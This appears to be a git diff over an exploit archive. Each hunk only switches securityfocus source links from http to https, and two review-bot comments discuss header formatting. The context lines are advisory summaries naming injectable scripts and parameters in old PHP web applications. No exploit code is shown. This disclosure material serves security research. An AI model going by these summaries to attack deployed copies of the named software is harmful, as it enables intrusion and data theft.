@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8739/info +source: https://www.securityfocus.com/bid/8739/info Multiple SQL Injection vulnerabilities have been discovered that affect DCP-Portal scripts. These issues are likely due to a lack of sufficient sanitization performed on user supplied URI parameters. Attacks have been demonstrated that inject partial SQL queries, as values for URI parameters, in a manner that influences DCP-Portal SQL query logic to the attackers benefit. diff --git a/exploits/php/webapps/23207.txt b/exploits/php/webapps/23207.txt index 74f915328..4fc90499e 100644 --- a/exploits/php/webapps/23207.txt +++ b/exploits/php/webapps/23207.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8740/info +source: https://www.securityfocus.com/bid/8740/info It has been reported that Atrise Everyfind is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input. The problem exists in the search module of the software. This issue may allow a remote attacker to execute HTML or script code in user's browser. diff --git a/exploits/php/webapps/23208.txt b/exploits/php/webapps/23208.txt index 608509ff4..da86ee997 100644 --- a/exploits/php/webapps/23208.txt +++ b/exploits/php/webapps/23208.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8744/info +source: https://www.securityfocus.com/bid/8744/info It has been reported that MPNews PRO is prone to an information disclosure vulnerability. The problem is believed to occur due to MPNews PRO failing to sufficiently filter specific dot-dot-slash sequences (../). As a result, an attacker may be capable of viewing the contents of files located outside of the established web root. diff --git a/exploits/php/webapps/23213.txt b/exploits/php/webapps/23213.txt index db4a49e24..f808fdaa5 100644 --- a/exploits/php/webapps/23213.txt +++ b/exploits/php/webapps/23213.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8756/info +source: https://www.securityfocus.com/bid/8756/info Wordpress has been reported prone to multiple SQL injection vulnerabilities. The issues have been reported to exist in the blog.header.php script. A lack of sufficient sanitization performed on 'cat' and 'order_by' URI parameters, may allow an attacker to inject malicious SQL code and thereby influence legitimate Wordpress SQL queries. diff --git a/exploits/php/webapps/23218.txt b/exploits/php/webapps/23218.txt index 59d8a39cb..0444bbb66 100644 --- a/exploits/php/webapps/23218.txt +++ b/exploits/php/webapps/23218.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8767/info +source: https://www.securityfocus.com/bid/8767/info EternalMart Mailing List Manager and Guestbook are prone to remote file-include vulnerabilities. Remote attackers may cause malicious PHP code to run on the webserver. diff --git a/exploits/php/webapps/23219.txt b/exploits/php/webapps/23219.txt index a9d180682..4dfdeb2ef 100644 --- a/exploits/php/webapps/23219.txt +++ b/exploits/php/webapps/23219.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8768/info +source: https://www.securityfocus.com/bid/8768/info GuppY is reported to be prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input. The problem exists in the postguest module of the software. This issue may allow a remote attacker to execute HTML or script code in user's browser. diff --git a/exploits/php/webapps/23220.txt b/exploits/php/webapps/23220.txt index 66623a35b..e6a73a409 100644 --- a/exploits/php/webapps/23220.txt +++ b/exploits/php/webapps/23220.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8769/info +source: https://www.securityfocus.com/bid/8769/info GuppY is prone to an issue that could allow a remote attacker to read or write to files on the vulnerable server. 
diff --git a/exploits/php/webapps/23232.txt b/exploits/php/webapps/23232.txt index af499dec4..2718346bd 100644 --- a/exploits/php/webapps/23232.txt +++ b/exploits/php/webapps/23232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8791/info +source: https://www.securityfocus.com/bid/8791/info PayPal Store Front is prone to a remote file include vulnerability. It may be possible for a remote attacker to influence the include path for an external page to point to an attacker-specified location. This could be exploited to include a remote PHP script, which will be executed in the context of the web server hosting the vulnerable PayPal Store Front software. diff --git a/exploits/php/webapps/23233.txt b/exploits/php/webapps/23233.txt index 1a1b3346c..f1beddb88 100644 --- a/exploits/php/webapps/23233.txt +++ b/exploits/php/webapps/23233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8792/info +source: https://www.securityfocus.com/bid/8792/info Geeklog has been reported prone to multiple HTML Injection vulnerabilities. diff --git a/exploits/php/webapps/23237.pl b/exploits/php/webapps/23237.pl index 404d00f6c..393e81925 100755 --- a/exploits/php/webapps/23237.pl +++ b/exploits/php/webapps/23237.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8798/info +source: https://www.securityfocus.com/bid/8798/info It has been reported that PHP-Nuke is prone to a SQL injection vulnerability that may allow a remote attacker to inject malicious SQL syntax into database queries. The issue is said to occur within the admin.php file, specifically when authenticating to a server. diff --git a/exploits/php/webapps/23238.txt b/exploits/php/webapps/23238.txt index ad7353a64..567bdd60a 100644 --- a/exploits/php/webapps/23238.txt +++ b/exploits/php/webapps/23238.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8814/info +source: https://www.securityfocus.com/bid/8814/info It has been reported that Gallery is prone to a remote file include vulnerability in the index.php script file. The problem occurs due to the program failing to verify the location in which it includes the util.php script, when handling specific requests to index.php. As a result, an attacker may be capable of having arbitrary PHP script code being executed on the remote host with the privileges of the web server. diff --git a/exploits/php/webapps/23244.txt b/exploits/php/webapps/23244.txt index 30ff429f4..443eb2732 100644 --- a/exploits/php/webapps/23244.txt +++ b/exploits/php/webapps/23244.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8823/info +source: https://www.securityfocus.com/bid/8823/info WrenSoft Zoom Search Engine is prone to a cross-site scripting issue in the software's search module. A remote attacker may be able to execute HTML or script code in a user's browser. diff --git a/exploits/php/webapps/23259.txt b/exploits/php/webapps/23259.txt index ca1128726..0134ee3a7 100644 --- a/exploits/php/webapps/23259.txt +++ b/exploits/php/webapps/23259.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8847/info +source: https://www.securityfocus.com/bid/8847/info GoldLink is prone to SQL injection attacks. This is due to insufficient validation of values supplied via cookies. As a result, it may be possible to manipulate SQL queries, potentially resulting in information disclosure, bulletin board compromise or other consequences. diff --git a/exploits/php/webapps/23260.sh b/exploits/php/webapps/23260.sh index 1776e446e..48447affa 100755 --- a/exploits/php/webapps/23260.sh +++ b/exploits/php/webapps/23260.sh 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8849/info +source: https://www.securityfocus.com/bid/8849/info An SQL injection vulnerability has been reported in the Geeklog "forgot password" feature (introduced in Geeklog 1.3.8). Due to insufficient sanitization of user-supplied input, it is possible for remote attacks to influence database queries. This could result in compromise of the Geeklog installation or attacks against the database. diff --git a/exploits/php/webapps/23261.txt b/exploits/php/webapps/23261.txt index aa2bf3f40..965b2bba2 100644 --- a/exploits/php/webapps/23261.txt +++ b/exploits/php/webapps/23261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8850/info +source: https://www.securityfocus.com/bid/8850/info Bytehoard is prone to directory traversal attacks. This could potentially permit remote attackers to gain unauthorized access to sensitive files hosted on the system running the software. diff --git a/exploits/php/webapps/23264.txt b/exploits/php/webapps/23264.txt index 22c2cc1af..4860aad72 100644 --- a/exploits/php/webapps/23264.txt +++ b/exploits/php/webapps/23264.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8856/info +source: https://www.securityfocus.com/bid/8856/info It has been reported that DeskPro is prone to multiple SQL injection vulnerabilities due to insufficient sanitization of user-supplied input. The problem is reported to be present in various parameters such as cat, article, and ticketid of the faq.php and view.php modules. This issue may allow a remote attacker to influence SQL query logic in order to compromise the DeskPro application or view/modify sensitive information. The consequences of exploitation may vary depending on the underlying database implementation. diff --git a/exploits/php/webapps/23269.txt b/exploits/php/webapps/23269.txt index 15d5b5f8d..2eda4804d 100644 --- a/exploits/php/webapps/23269.txt +++ b/exploits/php/webapps/23269.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8863/info +source: https://www.securityfocus.com/bid/8863/info It has been reported that FuzzyMonkey MyClassifieds may be prone to a SQL injection vulnerability that may allow an attacker to disclose user passwords by supplying malicious SQL code to the Email variable. This attack may cause the software to write user password to a world readable file, which may be accessed to launch further attacker against a system. diff --git a/exploits/php/webapps/23294.txt b/exploits/php/webapps/23294.txt index e6b43d526..bce50677d 100644 --- a/exploits/php/webapps/23294.txt +++ b/exploits/php/webapps/23294.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8896/info +source: https://www.securityfocus.com/bid/8896/info It has been reported that Chi Kien Uong Guestbook may be prone to a cross-site scripting vulnerability that may allow a remote attacker to execute HTML or script code in a user's browser. The problem is reported to present itself due to insufficient sanitization of user-supplied data when posting an e-mail address or URL to the site. It has been reported that double quotes are not filtered therefore an attacker may be able to append malicious script code in order to be executed on a victim's web browser. diff --git a/exploits/php/webapps/23302.txt b/exploits/php/webapps/23302.txt index cc9097855..a59dfaceb 100644 --- a/exploits/php/webapps/23302.txt +++ b/exploits/php/webapps/23302.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8902/info +source: https://www.securityfocus.com/bid/8902/info A problem has been reported in the handling of some types of input by Les Visiteurs. Because of this, an attacker may be able to execute arbitrary commands on the system. diff --git a/exploits/php/webapps/23313.txt b/exploits/php/webapps/23313.txt index bf8217531..1bf653c6c 100644 --- a/exploits/php/webapps/23313.txt +++ b/exploits/php/webapps/23313.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8934/info +source: https://www.securityfocus.com/bid/8934/info It has been reported that LedForums is prone to a HTML injection vulnerability that may allow an attacker to execute HTML code in a user's browser. The issue is reported to be present in the 'top_message' and 'topic' fields. This problem is due to insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/23319.txt b/exploits/php/webapps/23319.txt index e91302456..6140ff614 100644 --- a/exploits/php/webapps/23319.txt +++ b/exploits/php/webapps/23319.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8944/info +source: https://www.securityfocus.com/bid/8944/info It has been reported that Tritanium Bulletin Board may be prone to an access validation error that may allow a remote attacker to to gain unauthorized access to threads. A remote attacker may be able to access sensitive data by modifying the URL and supplying a value for thread_id, forum_id, and sid paremeters. diff --git a/exploits/php/webapps/23330.txt b/exploits/php/webapps/23330.txt index ba5e8bc2c..e3838850b 100644 --- a/exploits/php/webapps/23330.txt +++ b/exploits/php/webapps/23330.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8956/info +source: https://www.securityfocus.com/bid/8956/info It has been reported that Sympoll is prone to a cross-site scripting vulnerability. The issue is reported to exist due insufficient sanitization of user-supplied data through the 'vo' parameter. The problem may allow a remote attacker to execute HTML or script code in the browser of a user following a malicious link created by an attacker. diff --git a/exploits/php/webapps/23333.txt b/exploits/php/webapps/23333.txt index 2f6c83a8c..e46de4325 100644 --- a/exploits/php/webapps/23333.txt +++ b/exploits/php/webapps/23333.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8960/info +source: https://www.securityfocus.com/bid/8960/info PHPKIT is reported to be prone to a cross-site scripting vulnerability. This is due to insufficient sanitization of HTML from URI parameters, which will be displayed in web pages that are dynamically generated by the software. The issue exists in the 'include.php' script. diff --git a/exploits/php/webapps/23336.txt b/exploits/php/webapps/23336.txt index 7909eb375..040f27255 100644 --- a/exploits/php/webapps/23336.txt +++ b/exploits/php/webapps/23336.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8972/info +source: https://www.securityfocus.com/bid/8972/info It has been reported that OpenAutoClassifieds is prone to a cross-site scripting vulnerability. The issue is reported to exist due insufficient sanitization of user-supplied data through the 'listings' parameter. The problem may allow a remote attacker to execute HTML or script code in the browser of a user following a malicious link created by an attacker. diff --git a/exploits/php/webapps/23338.txt b/exploits/php/webapps/23338.txt index d1c71d794..313a6985f 100644 --- a/exploits/php/webapps/23338.txt +++ b/exploits/php/webapps/23338.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8977/info +source: https://www.securityfocus.com/bid/8977/info It has been reported that Easy PHP Photo Album is prone to a HTML injection vulnerability that may allow an attacker to execute HTML code in a user's browser. The issue is reported to be present in the 'dir' parameter. This problem is due to insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/23363.txt b/exploits/php/webapps/23363.txt index f6fbbc68a..b888b28c7 100644 --- a/exploits/php/webapps/23363.txt +++ b/exploits/php/webapps/23363.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8994/info +source: https://www.securityfocus.com/bid/8994/info A SQL injection vulnerability has been reported for phpBB systems. diff --git a/exploits/php/webapps/23372.txt b/exploits/php/webapps/23372.txt index 4a3e65ade..b3c991a2c 100644 --- a/exploits/php/webapps/23372.txt +++ b/exploits/php/webapps/23372.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9018/info +source: https://www.securityfocus.com/bid/9018/info PHP-Coolfile allows unauthorized administrative access due to an error in the way access is evaluated in the action.php file. This could allow a remote user to obtain the administrative username and password for the site. diff --git a/exploits/php/webapps/23381.txt b/exploits/php/webapps/23381.txt index 18a9f11ed..594bdb845 100644 --- a/exploits/php/webapps/23381.txt +++ b/exploits/php/webapps/23381.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9053/info +source: https://www.securityfocus.com/bid/9053/info It has been reported that phpWebFileManager may be prone to a directory traversal vulnerability that may allow an attacker to gain access to sensitive information. The issue presents itself due to insufficient sanitization of user-supplied input. An attacker may traverse outside the server root directory by using '../' character sequences. diff --git a/exploits/php/webapps/23384.txt b/exploits/php/webapps/23384.txt index 651785913..0ff37d4c2 100644 --- a/exploits/php/webapps/23384.txt +++ b/exploits/php/webapps/23384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9054/info +source: https://www.securityfocus.com/bid/9054/info It has been reported that Rolis Guestbook may be vulnerable to an input validation issue that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. diff --git a/exploits/php/webapps/23386.txt b/exploits/php/webapps/23386.txt index ead679659..52a829762 100644 
--- a/exploits/php/webapps/23386.txt +++ b/exploits/php/webapps/23386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9056/info +source: https://www.securityfocus.com/bid/9056/info It has been reported that Auto Directory Index is prone to a cross-site scripting vulnerability. The issue is reported to exist due insufficient sanitization of user-supplied data through the 'dir' parameter, which will then be included in a dynamically generated web page. The problem may allow a remote attacker to execute HTML or script code in the browser of a user following a malicious link created by an attacker. diff --git a/exploits/php/webapps/23403.pl b/exploits/php/webapps/23403.pl index e6f400ee3..cf923b6f4 100755 --- a/exploits/php/webapps/23403.pl +++ b/exploits/php/webapps/23403.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9113/info +source: https://www.securityfocus.com/bid/9113/info A problem has been identified in the handling of input by My_eGallery. Because of this, it may be possible for a remote user to gain unauthorized access to a system using the vulnerable software. diff --git a/exploits/php/webapps/23406.txt b/exploits/php/webapps/23406.txt index af9dc552c..cd05ed809 100644 --- a/exploits/php/webapps/23406.txt +++ b/exploits/php/webapps/23406.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9130/info +source: https://www.securityfocus.com/bid/9130/info An information disclosure weakness has been reported in CuteNews 1.3, that may expose sensitive server configuration data. The problem occurs due to CuteNews accepting a debug query that will result in the exposure of information returned from a call to the phpinfo() function. diff --git a/exploits/php/webapps/23416.txt b/exploits/php/webapps/23416.txt index e3dd73bde..9ba3f7eda 100644 --- a/exploits/php/webapps/23416.txt +++ b/exploits/php/webapps/23416.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9166/info +source: https://www.securityfocus.com/bid/9166/info Multiple vulnerabilities were reported in Xoops. These issues include SQL injection and input validation issues that will allow remote attackers to manipulate banners and local variables. Exploitation could compromise the software or have other consequences. diff --git a/exploits/php/webapps/23420.txt b/exploits/php/webapps/23420.txt index 2865cb67d..f0b7dcf3e 100644 --- a/exploits/php/webapps/23420.txt +++ b/exploits/php/webapps/23420.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9179/info +source: https://www.securityfocus.com/bid/9179/info Bitfolge Snif is prone to a cross-site scripting vulnerability. As a result, hostile HTML and script code may be embedded in a malicious link to a site hosting the vulnerable software. If such a link is visited by a victim user, the attacker-supplied code may render in their web browser in the context of the site. diff --git a/exploits/php/webapps/23428.html b/exploits/php/webapps/23428.html index a68b4be4c..f86d31256 100644 --- a/exploits/php/webapps/23428.html +++ b/exploits/php/webapps/23428.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9193/info +source: https://www.securityfocus.com/bid/9193/info It has been reported that Mambo Server may be prone to an unauthorized access vulnerability that may allow an attacker to modify a user and/or an administrator's information such as password, email, name etc, after supplying a legitimate user id. diff --git a/exploits/php/webapps/23429.txt b/exploits/php/webapps/23429.txt index 6b42cbacd..411c3bf9c 100644 --- a/exploits/php/webapps/23429.txt +++ b/exploits/php/webapps/23429.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9196/info +source: https://www.securityfocus.com/bid/9196/info It has bee reported that Mambo Open Source 4.0.14 Server is prone to SQL injection attacks. The problem is said to occur due to insufficient sanitization of data passed to specific index.php variables. As a result, an attacker may be capable of influencing the logic of specific queries or statements made by the underlying database. This could ultimately result in a number of attacks being carried out against the system. diff --git a/exploits/php/webapps/23430.txt b/exploits/php/webapps/23430.txt index 43f0a8eca..17348a534 100644 --- a/exploits/php/webapps/23430.txt +++ b/exploits/php/webapps/23430.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9197/info +source: https://www.securityfocus.com/bid/9197/info Mambo Open Source is prone to SQL injection attacks. This is due to an input validation error in 'pollBooth.php'. In particular, various user-supplied variables are used in an SQL query without proper sanitization of SQL syntax. As a result, a remote attacker could include malicious SQL syntax via URI parameters and influence database queries. diff --git a/exploits/php/webapps/23434.pl b/exploits/php/webapps/23434.pl index edf9fcba9..eb11d3938 100755 --- a/exploits/php/webapps/23434.pl +++ b/exploits/php/webapps/23434.pl 
@@ -1,5 +1,5 @@ #!/usr/bin/perl -#source: http://www.securityfocus.com/bid/9211/info +#source: https://www.securityfocus.com/bid/9211/info # #It has been reported that one of the scripts included with osCommerce fails to validate user-supplied input, rendering it vulnerable to a SQL injection attack. The script in question is used to verify account details during the new user registration process and has the filename "create_account_process.php". It may be possible for attackers to manipulate the query to corrupt data in the database or, possibly, gain access on the underlying host (through, for example, stored procedures or vulnerabilities in the database server). # diff --git a/exploits/php/webapps/23443.txt b/exploits/php/webapps/23443.txt index 1372b9c14..2ea5c9200 100644 --- a/exploits/php/webapps/23443.txt +++ b/exploits/php/webapps/23443.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9231/info +source: https://www.securityfocus.com/bid/9231/info Multiple vulnerabilities have been identified in the software that include information disclosure, path disclosure, SQL injection, and a plaintext password weakness. diff --git a/exploits/php/webapps/23445.txt b/exploits/php/webapps/23445.txt index 8ee3cce0e..0908fba45 100644 --- a/exploits/php/webapps/23445.txt +++ b/exploits/php/webapps/23445.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9238/info +source: https://www.securityfocus.com/bid/9238/info It has been reported that osCommerce may be prone to a cross-site scripting vulnerability that may allow an attacker to construct a malicious link containing HTML or script code that may be rendered in a user's browser. diff --git a/exploits/php/webapps/23453.txt b/exploits/php/webapps/23453.txt index e9ba79457..578e02093 100644 --- a/exploits/php/webapps/23453.txt +++ b/exploits/php/webapps/23453.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9268/info +source: https://www.securityfocus.com/bid/9268/info It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem exists in the 'index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php', 'Include/functions_message.php', 'Include/Start.php' scripts of the software. diff --git a/exploits/php/webapps/23454.txt b/exploits/php/webapps/23454.txt index a96e494bf..5764b36a4 100644 --- a/exploits/php/webapps/23454.txt +++ b/exploits/php/webapps/23454.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9268/info +source: https://www.securityfocus.com/bid/9268/info It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem exists in the 'index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php', 'Include/functions_message.php', 'Include/Start.php' scripts of the software. diff --git a/exploits/php/webapps/23455.txt b/exploits/php/webapps/23455.txt index 79ec28173..52c943ac5 100644 --- a/exploits/php/webapps/23455.txt +++ b/exploits/php/webapps/23455.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9268/info +source: https://www.securityfocus.com/bid/9268/info It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem exists in the 'index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php', 'Include/functions_message.php', 'Include/Start.php' scripts of the software. 
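Review bot: line 1 of exploits/php/webapps/23403.pl is still a bare `source:` line after this change, with no `#` in front of it or of the description line under it, although the file is mode 100755 and has a .pl extension. 23434.pl in this same patch shows the consistent form: `#!/usr/bin/perl` first, then `#source: https://...` and `#`-prefixed description lines. Since the line is being touched anyway, comment the header in 23403.pl the same way (23428.html carries the same uncommented header for its own file type), or record it as a follow-up so this scheme rewrite stays purely mechanical.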
diff --git a/exploits/php/webapps/23456.txt b/exploits/php/webapps/23456.txt index 1f2677581..572ff6f76 100644 --- a/exploits/php/webapps/23456.txt +++ b/exploits/php/webapps/23456.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9268/info +source: https://www.securityfocus.com/bid/9268/info It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem exists in the 'index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php', 'Include/functions_message.php', 'Include/Start.php' scripts of the software. diff --git a/exploits/php/webapps/23457.txt b/exploits/php/webapps/23457.txt index d3bd2d105..44ccc0d83 100644 --- a/exploits/php/webapps/23457.txt +++ b/exploits/php/webapps/23457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9268/info +source: https://www.securityfocus.com/bid/9268/info It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem exists in the 'index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php', 'Include/functions_message.php', 'Include/Start.php' scripts of the software. diff --git a/exploits/php/webapps/23458.txt b/exploits/php/webapps/23458.txt index 357902290..a073c7e97 100644 --- a/exploits/php/webapps/23458.txt +++ b/exploits/php/webapps/23458.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9268/info +source: https://www.securityfocus.com/bid/9268/info It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem exists in the 'index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php', 'Include/functions_message.php', 'Include/Start.php' scripts of the software. diff --git a/exploits/php/webapps/23459.txt b/exploits/php/webapps/23459.txt index c354f558a..7c3830672 100644 --- a/exploits/php/webapps/23459.txt +++ b/exploits/php/webapps/23459.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9269/info +source: https://www.securityfocus.com/bid/9269/info Xoops is prone to a cross-site scripting vulnerability in the 'myheader.php' script included in the mylinks module. A remote attacker could exploit this issue by embedding hostile HTML and script code in a malicious link to the vulnerable script. Exploitation could allow for theft of cookie-based authentication credentials or other attacks. diff --git a/exploits/php/webapps/23462.txt b/exploits/php/webapps/23462.txt index 6c89252d2..c35a44f74 100644 --- a/exploits/php/webapps/23462.txt +++ b/exploits/php/webapps/23462.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9275/info +source: https://www.securityfocus.com/bid/9275/info It has been reported that one of the scripts included with osCommerce fails to validate user-supplied input, rendering it vulnerable to a SQL injection attack. diff --git a/exploits/php/webapps/23463.txt b/exploits/php/webapps/23463.txt index 5c2c3668e..5d6b81b1c 100644 --- a/exploits/php/webapps/23463.txt +++ b/exploits/php/webapps/23463.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9277/info +source: https://www.securityfocus.com/bid/9277/info A vulnerability has been reported to exist in the software that may allow a remote user to launch cross-site scripting attacks. The problem is reported to exist due to improper sanitizing of user-supplied data in certain URI parameters passed to the default.php script. This vulnerability makes it possible for an attacker to construct a malicious link containing HTML or script code that may be rendered in a user's browser upon visiting that link. This attack would occur in the security context of the site. diff --git a/exploits/php/webapps/23473.txt b/exploits/php/webapps/23473.txt index dd3f445d7..b5052cadc 100644 --- a/exploits/php/webapps/23473.txt +++ b/exploits/php/webapps/23473.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9286/info +source: https://www.securityfocus.com/bid/9286/info my little forum is prone to a cross-site scripting vulnerability in the 'email.php' script. The source of the problem is that HTML and script code are not adequately sanitized from input supplied via the URI parameters. A remote attacker could exploit this issue by embedding hostile HTML and script code in a malicious link to the vulnerable script. diff --git a/exploits/php/webapps/23474.txt b/exploits/php/webapps/23474.txt index 42ba2c5a8..db6ef0353 100644 --- a/exploits/php/webapps/23474.txt +++ b/exploits/php/webapps/23474.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9289/info +source: https://www.securityfocus.com/bid/9289/info Webfroot Shoutbox is prone to a cross-site scripting vulnerability in the 'viewshoutbox.php' script. The source of the problem is that HTML and script code are not adequately sanitized from input supplied via URI parameters. This input will be included in dynamically generated web pages. A remote attacker could exploit this issue by embedding hostile HTML and script code in a malicious link to the vulnerable script. The attacker-supplied code will be interpreted in the context of the site hosting the vulnerable software. diff --git a/exploits/php/webapps/23475.txt b/exploits/php/webapps/23475.txt index 941c80492..7fbe93276 100644 --- a/exploits/php/webapps/23475.txt +++ b/exploits/php/webapps/23475.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9290/info +source: https://www.securityfocus.com/bid/9290/info phpBB is prone to a cross-site scripting vulnerability in the 'privmsg.php' script. The source of the problem is that HTML and script code are not adequately sanitized from input supplied via URI parameters. This input will be included in dynamically generated web pages. A remote attacker could exploit this issue by embedding hostile HTML and script code in a malicious link to the vulnerable script. The attacker-supplied code will be interpreted in the context of the site hosting the vulnerable software. diff --git a/exploits/php/webapps/23476.txt b/exploits/php/webapps/23476.txt index 293b3cfa8..a34f64909 100644 --- a/exploits/php/webapps/23476.txt +++ b/exploits/php/webapps/23476.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9292/info +source: https://www.securityfocus.com/bid/9292/info KnowledgeBuilder is prone to a remote file include vulnerability. An attacker could exploit this to cause hostile PHP scripts to be included and executed from a remote server. This would occur in the security context of the web server hosting the software. diff --git a/exploits/php/webapps/23477.txt b/exploits/php/webapps/23477.txt index 16a63d3f6..28f5e7ad3 100644 --- a/exploits/php/webapps/23477.txt +++ b/exploits/php/webapps/23477.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9293/info +source: https://www.securityfocus.com/bid/9293/info It has been reported that Psychoblogger may be prone to multiple cross-site scripting vulnerabilities that may allow a remote attacker to execute HTML or script code in a user's browser. The issues are reported to exist in the 'imageview.php', 'entryadmin.php', 'authoredit.php', 'blockedit.php', 'configadmin.php' and 'quoteedit.php' scripts. These vulnerabilities result from insufficient sanitization of user-supplied data passed via vulnerable parameters. diff --git a/exploits/php/webapps/23478.txt b/exploits/php/webapps/23478.txt index d30669c98..e787bdc27 100644 --- a/exploits/php/webapps/23478.txt +++ b/exploits/php/webapps/23478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9293/info +source: https://www.securityfocus.com/bid/9293/info It has been reported that Psychoblogger may be prone to multiple cross-site scripting vulnerabilities that may allow a remote attacker to execute HTML or script code in a user's browser. The issues are reported to exist in the 'imageview.php', 'entryadmin.php', 'authoredit.php', 'blockedit.php', 'configadmin.php' and 'quoteedit.php' scripts. These vulnerabilities result from insufficient sanitization of user-supplied data passed via vulnerable parameters. 
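Review bot: in the 23477.txt and 23478.txt hunks the rewritten line 1 (bid/9293) and the description context are identical in both files, the same pattern as 23453.txt through 23455.txt on bid/9268, so the header shown does not say which of the listed Psychoblogger scripts each file covers. The scheme change itself is consistent across the pair, and the duplication predates it. A follow-up that names the affected script on a second header line in each file would make the entries distinguishable without opening them.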
diff --git a/exploits/php/webapps/23483.txt b/exploits/php/webapps/23483.txt index 36cb53f8a..9fccfa9e6 100644 --- a/exploits/php/webapps/23483.txt +++ b/exploits/php/webapps/23483.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9303/info +source: https://www.securityfocus.com/bid/9303/info OpenBB is prone to a cross-site scripting vulnerability in the 'board.php' script. The source of the problem is that HTML and script code are not adequately sanitized from input supplied via URI parameters. This input will be included in dynamically generated web pages. A remote attacker could exploit this issue by embedding hostile HTML and script code in a malicious link to the vulnerable script. diff --git a/exploits/php/webapps/23484.txt b/exploits/php/webapps/23484.txt index ebba3f211..048998c15 100644 --- a/exploits/php/webapps/23484.txt +++ b/exploits/php/webapps/23484.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9305/info +source: https://www.securityfocus.com/bid/9305/info A vulnerability has been reported to exist in the Survey module of PHP-Nuke that may allow a remote attacker to inject malicious SQL syntax into database 